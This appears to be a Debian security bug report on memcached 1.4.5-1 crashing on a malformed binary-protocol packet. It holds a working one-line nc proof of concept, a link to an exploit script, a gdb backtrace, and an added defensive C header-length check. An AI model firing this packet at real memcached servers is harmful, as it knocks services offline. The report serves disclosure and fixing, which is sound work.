Package: memcached
Version: 1.4.5-1
Severity: important
Tags: security

memcached service crashes when sending specially crafted packet as reported in here https://code.google.com/p/memcached/issues/detail?id=i192 Mar 15, 2011. Upstream has not fixed this yet.

PoC:

1) echo -en '\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' | nc localhost 11211
2) http://insecurety.net/wordpress/wp-content/uploads/2013/04/killthebox.py_.txt

Backtrace from squeeze libmemcached5 0.40-1 memcached 1.4.5-1 below:

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7ffff69f0700 (LWP 16957)]
0x00007ffff76c7482 in _wordcopy_bwd_dest_aligned (dstp=140737352400864, srcp=6501120, len=2305843009213693940) at wordcopy.c:392
392     wordcopy.c: No such file or directory.
        in wordcopy.c
(gdb) bt
#0  0x00007ffff76c7482 in _wordcopy_bwd_dest_aligned (dstp=140737352400864, srcp=6501120, len=2305843009213693940) at wordcopy.c:392
#1  0x00007ffff76c568a in *__GI_memmove (dest=0x7ffff7e58053, src=<value optimized out>, len=18446744073709551581) at memmove.c:99
#2  0x000000000040a105 in ?? ()
#3  0x00007ffff7bcc344 in event_base_loop () from /usr/lib/libevent-1.4.so.2
#4  0x000000000040d7c4 in ?? ()
#5  0x00007ffff79af8ca in start_thread (arg=<value optimized out>) at pthread_create.c:300
#6  0x00007ffff7716b6d in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:112
#7  0x0000000000000000 in ?? ()

Please contact me in case you need help solving this issue.

---
Henri Salo
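Added example (not part of the original report and not memcached's own code): a header sanity check for the memcached binary protocol, run over the first 24 bytes of the packet above and over a constructed well-formed header. The names check_header and value_len_signed and the MAX_BODY cap are assumptions made for this illustration.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Binary-protocol request header fields (24 bytes on the wire, big-endian). */
struct bin_req_hdr { uint8_t magic, opcode, extlen; uint16_t keylen; uint32_t bodylen; };

#define HDR_LEN  24
#define MAX_BODY (1024u * 1024u + 512u)  /* assumed cap: 1 MiB item plus slack */

enum hdr_verdict { HDR_OK, HDR_SHORT, HDR_BAD_MAGIC, HDR_BODY_TOO_SMALL, HDR_BODY_TOO_LARGE };

/* First 24 bytes of the packet in the report (trailing bytes are zero). */
static const uint8_t POC_HDR[HDR_LEN] = { 0x80,0x12,0x00,0x01,0x08,0x00,0x00,0x00, 0xff,0xff,0xff,0xe8 };
/* Constructed well-formed header: key 3 + extras 8 + value 5 = body 16. */
static const uint8_t OK_HDR[HDR_LEN]  = { 0x80,0x01,0x00,0x03,0x08,0x00,0x00,0x00, 0x00,0x00,0x00,0x10 };

/* Decode the length fields and reject inconsistent ones before any copy is sized from them. */
static enum hdr_verdict check_header(const uint8_t *p, size_t n, struct bin_req_hdr *h)
{
    if (n < HDR_LEN) return HDR_SHORT;
    h->magic  = p[0];
    h->opcode = p[1];
    h->keylen = (uint16_t)((p[2] << 8) | p[3]);
    h->extlen = p[4];
    h->bodylen = ((uint32_t)p[8] << 24) | ((uint32_t)p[9] << 16) | ((uint32_t)p[10] << 8) | p[11];
    if (h->magic != 0x80) return HDR_BAD_MAGIC;
    /* Unsigned comparison first, so bodylen - keylen - extlen is never computed when it would wrap. */
    if (h->bodylen < (uint32_t)h->keylen + h->extlen) return HDR_BODY_TOO_SMALL;
    if (h->bodylen > MAX_BODY) return HDR_BODY_TOO_LARGE;
    return HDR_OK;
}

/* For contrast: the value length if the body length is held in a signed 32-bit int.
 * A negative result converted to size_t is a value close to 2^64, the order of the
 * len in the memmove frame of the backtrace (an inference, not stated in the report). */
static long value_len_signed(const struct bin_req_hdr *h)
{
    return (long)(int32_t)h->bodylen - (h->keylen + h->extlen);
}

int main(void)
{
    struct bin_req_hdr h;
    enum hdr_verdict v = check_header(POC_HDR, sizeof POC_HDR, &h);
    printf("report packet: verdict=%d bodylen=0x%08x signed value len=%ld\n",
           (int)v, (unsigned)h.bodylen, value_len_signed(&h));
    v = check_header(OK_HDR, sizeof OK_HDR, &h);
    printf("constructed:   verdict=%d bodylen=%u\n", (int)v, (unsigned)h.bodylen);
    return 0;
}
```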